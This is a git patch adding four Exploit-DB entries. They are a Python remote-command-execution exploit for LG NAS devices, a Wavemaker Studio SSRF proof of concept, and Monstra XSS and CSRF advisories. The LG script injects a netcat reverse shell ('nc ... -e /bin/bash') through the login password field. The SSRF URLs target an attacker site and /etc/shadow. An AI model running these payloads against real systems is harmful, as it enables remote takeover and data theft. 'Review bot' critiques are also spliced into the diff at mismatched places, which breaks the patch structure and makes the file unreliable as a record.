From e5c23cdd534e6cf6251f610a8f26865fc37d9313 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 13 Aug 2018 05:01:45 +0000
Subject: [PATCH] DB: 2018-08-13 4 changes to exploits/shellcodes
LG NAS 3718.510.a0 - Remote Command Execution
Monstra 3.0.4 - Cross-Site Scripting
Wavemaker Studio 6.6 - Server-Side Request Forgery
Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)
---
 exploits/hardware/webapps/45109.py | 52 ++++++++++++++++++++++++++++++
 exploits/java/webapps/45158.txt | 35 ++++++++++++++++++++
 exploits/php/webapps/45156.txt | 17 ++++++++++
 exploits/php/webapps/45164.txt | 41 +++++++++++++++++++++++
 files_exploits.csv | 4 +++
 5 files changed, 149 insertions(+)
 create mode 100755 exploits/hardware/webapps/45109.py
 create mode 100644 exploits/java/webapps/45158.txt
 create mode 100644 exploits/php/webapps/45156.txt
 create mode 100644 exploits/php/webapps/45164.txt
diff --git a/exploits/hardware/webapps/45109.py b/exploits/hardware/webapps/45109.py
new file mode 100755
index 000000000..7a0b0c807
--- /dev/null
+++ b/exploits/hardware/webapps/45109.py
@@ -0,0 +1,52 @@
+# LG NAS 3718.510.a0 - Remote Command Execution
+# Author: @0x616163
+# Date: 2018-07-29
+# Credits: https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
+# CVE: N/A
+# Firmware Version: 3718.510.a0
+
+#!/usr/bin/env python
+
+import sys
+import argparse
+import requests
+from collections import OrderedDict
+
+def checkUser(target):
+ # Exploiting this vulnerability requires a valid user account
+ # on the target NAS otherwise the vulnerable code is not executed
+ parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass'), ('mobile', 'false')])
+ r = requests.post("http://" + target + ":8000/en/php/login_check.php", data=parameters)
+ if r.text == "NG:WRONG PASSWORD\n":
+ print "[*] Valid user found: admin"
+ return 0
+ elif r.text == "NG:NO USER\n":
+ print "[*] User not found: admin"
+ sys.exit(1)
+
+def sendPayload(target,lhost,lport):
+ print "[*] Sending payload.."
+ try:
+ parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass;/usr/bin/nc ' + lhost + " " + lport + " " + '-e /bin/bash'), ('mobile', 'false')])
+ r = requests.post("http://" + target + "/en/php/login_check.php", data=parameters,timeout=0.001)
+ except requests.exceptions.ReadTimeout:
+ print "[*] Payload sent. Exiting."
+ sys.exit(0)
+
+ return 0
+def main():
+ parser = argparse.ArgumentParser(add_help=True, description='LG NAS Unauthenticated Remote Code Execution')
+ parser.add_argument('-t', action="store", dest='target', help='Target host or IP')
+ parser.add_argument('-l', action="store", dest='lhost', help='Local host or IP')
+ parser.add_argument('-p', action="store", dest='lport', help='Listening TCP port to connect back to')
+ results = parser.parse_args()
+ args = vars(results)
+ if len(sys.argv) < 1:
+ parser.print_help()
+ sys.exit(1)
+ else:
+ if checkUser(args['target']) == 0:
+ sendPayload(args['target'], args['lhost'],args['lport'])
+
+main()
+sys.exit(0)
\ No newline at end of file
diff --git a/exploits/java/webapps/45158.txt b/exploits/java/webapps/45158.txt
new file mode 100644
index 000000000..2ba2e9656
--- /dev/null
+++ b/exploits/java/webapps/45158.txt
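Review bot: The `except requests.exceptions.ReadTimeout:` in sendPayload only covers the read phase, but with `timeout=0.001` the connect phase is the one most likely to expire first, and that raises `ConnectTimeout`, which is not a ReadTimeout, so the script will usually die with a traceback instead of printing "Payload sent"; catching the parent class, `except requests.exceptions.Timeout:`, covers both cases. The two requests also disagree on the port: checkUser posts to `":8000/en/php/login_check.php"` while sendPayload posts to `"/en/php/login_check.php"` on the default port 80, so the username probe and the injection may not reach the same service. `if len(sys.argv) < 1:` in main can never be true because argv[0] is always present, so a missing -t/-l/-p arrives in checkUser as None and fails on the string concatenation; passing `required=True` to the three add_argument calls is the usual fix. The header comment says exploitation "requires a valid user account", but what checkUser actually establishes is only that the username admin exists (the `NG:WRONG PASSWORD` reply), no password is needed, which is what the argparse description's "Unauthenticated" means and is worth stating precisely for anyone assessing exposure. Finally, `#!/usr/bin/env python` on line 8 is inert because a shebang is honoured only on line 1, and the print statements make this Python 2 only.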
@@ -0,0 +1,35 @@
+# Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF).
+# Exploit Author: Gionathan "John" Reale
+# Google Dork: N/A
+# Date: 2018-08-01
+# Vendor Homepage: http://www.wavemaker.com/
+# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
+# Affected Version: 6.6
+# Tested on: Parrot OS
+# CVE : N/A
+
+# Description
+# Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an
+# attacker to pass dangerous content to a victim via a phishing link. The vulnerability
+# can also be exploited to access sensitive data or to use the server hosting Wavemaker
+# as a form of HTTP proxy among other things.
+
+# Proof Of Concept
+http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/
+http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow
+
+# Vulnerable Code
+# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java
+
+# Line 419-430
+@ExposeToClient
+public String getContent(String inUrl) throws IOException {
+ try {
+ String str = getRemoteContent(inUrl);
+ str = str.replace("", "");
+ return str;
+ } catch (Exception e) {
+ return "";
+ }
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/45156.txt b/exploits/php/webapps/45156.txt
new file mode 100644
index 000000000..e765a3a45
--- /dev/null
+++ b/exploits/php/webapps/45156.txt
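Review bot: The second proof-of-concept URL passes `inUrl=file///etc/shadow`, which has no scheme separator; as written it is not a file URL and is unlikely to reach the filesystem, so it should read `inUrl=file:///etc/shadow`. The quoted vulnerable code contains `str.replace("", "");`, a no-op with two empty arguments, which looks like the original arguments were lost when the text was captured; the excerpt should be re-checked against StudioService.java lines 419-430 before anyone relies on it. What the excerpt does show is that `getContent` forwards `inUrl` to `getRemoteContent` with no scheme or host restriction and turns every exception into an empty string, so a one-line remediation note would make the advisory more useful to defenders: accept only http and https, and reject loopback, link-local and private address ranges before fetching.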
@@ -0,0 +1,17 @@
+# Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Scripting
+# Date: 2018-08-04
+# Exploit Author: Nainsi Gupta
+# Vendor Homepage: http://monstra.org/
+# Software Link: https://github.com/monstra-cms/monstra
+# Product Name: Monstra-dev
+# Version: 3.0.4
+# Tested on: Windows 10 (Firefox/Chrome)
+# CVE : N/A
+
+# POC
+1- Go to the site ( http://server.com/monstra-dev/ ) .
+2- Click on Registration page (Registration) .
+3- Register by giving you name ,mail and soo on...
+4- Now log In i the website.
+5- After loggin in click on edit profile and in the frist name and last name copy paste this payload- in firsname paste "> and in Lastname paste ">
+6- After saving the above changes, click on edit profile page and you will be able to see to Pop up stating "Test" and "Case".
\ No newline at end of file
diff --git a/exploits/php/webapps/45164.txt b/exploits/php/webapps/45164.txt
new file mode 100644
index 000000000..cea4a65ff
--- /dev/null
+++ b/exploits/php/webapps/45164.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)
+# Date: 2018-08-04
+# Exploit Author: Nainsi Gupta
+# Vendor Homepage: http://monstra.org/
+# Product Name: Monstra-dev
+# Version: 3.0.4
+# Tested on: Windows 10 (Firefox/Chrome)
+# CVE : N/A
+
+# 1. Description
+# CSRF vulnerability in admin/user/edit in Monstra-dev 3.0.4 allows an attacker
+# to take over a user account by modifying user's data such as email and password
+
+# 2. Exploit and Proof of Concept
+# To exploit this vulnerability, victim need to be logged in at target site namely
+# victim.com and visit crafted site made by attacker namely attacker.com.
+# Then an authenticated POST request will be generated from victim browser and it will
+# be submit to victim.com to modify user's data to attacker desired value.
+
+#POC:CSRF
+
+
+
+
+
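Review bot: Step 5 gives the payload as a bare `">` for both the first name and the last name, which cannot produce the "Test" and "Case" pop-ups that step 6 describes; the script element appears to have been stripped from the text, so the real payload (presumably something of the form `"><script>alert("Test")</script>`, to be confirmed) has to be restored before the PoC is usable. The advisory also does not say whether the injected name is rendered anywhere other than the user's own edit-profile page; if it is only echoed back to the same account this is stored self-XSS with limited impact, whereas rendering in an admin-facing user list would make it far more serious, and the writeup should state which it is. The product is "Monstra-Dev" in the file but "Monstra 3.0.4" in the files_exploits.csv entry, and the steps carry several typos ("soo on", "log In i the website", "loggin", "frist"/"firsname") that should be cleaned up.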
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 30a134ed5..f81659b97 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -39756,6 +39756,7 @@ id,file,description,date,author,type,platform,port
 45103,exploits/linux/webapps/45103.txt,"Responsive Filemanager 9.13.1 - Server-Side Request Forgery",2018-07-30,"GUIA BRAHIM FOUAD",webapps,linux,
 45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux,
 45108,exploits/linux/webapps/45108.txt,"Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection",2018-07-31,0xB455,webapps,linux,
+45109,exploits/hardware/webapps/45109.py,"LG NAS 3718.510.a0 - Remote Command Execution",2018-07-31,0x616163,webapps,hardware,
 45127,exploits/php/webapps/45127.html,"WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)",2018-08-02,"Porhai Eung",webapps,php,80
 45128,exploits/php/webapps/45128.txt,"TI Online Examination System v2 - Arbitrary File Download",2018-08-02,AkkuS,webapps,php,80
 45129,exploits/php/webapps/45129.txt,"PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection",2018-08-02,AkkuS,webapps,php,80
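Review bot: Every line after `#POC:CSRF` in the new 41-line file is empty in this hunk, so the committed advisory contains no form, target URL or parameter names for the `admin/user/edit` request it describes; the HTML proof of concept appears to have been lost (most likely an auto-submitting form, though that is inference) and must be restored, because without it the CSRF cannot be reproduced or verified. The description also does not state which fields the edit request accepts or whether the current password is required to change the e-mail address or password, and that detail decides whether the impact is genuinely account hijacking. A remediation line would help defenders reading the entry: bind a per-session anti-CSRF token to the edit form, verify it server-side, and require the current password for any credential change.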
@@ -39775,6 +39776,9 @@ id,file,description,date,author,type,platform,port
 45152,exploits/aspx/webapps/45152.txt,"Sitecore.Net 8.1 - Directory Traversal",2018-08-06,Chris,webapps,aspx,
 45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,8080
 45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
+45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80
+45158,exploits/java/webapps/45158.txt,"Wavemaker Studio 6.6 - Server-Side Request Forgery",2018-08-06,"Gionathan Reale",webapps,java,
+45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,
 45172,exploits/hardware/webapps/45172.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)",2018-08-09,Wadeek,webapps,hardware,80
 45173,exploits/hardware/webapps/45173.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)",2018-08-09,Wadeek,webapps,hardware,80
 45177,exploits/php/webapps/45177.txt,"Zimbra 8.6.0_GA_1153 - Cross-Site Scripting",2018-08-10,"Dino Barlattani",webapps,php,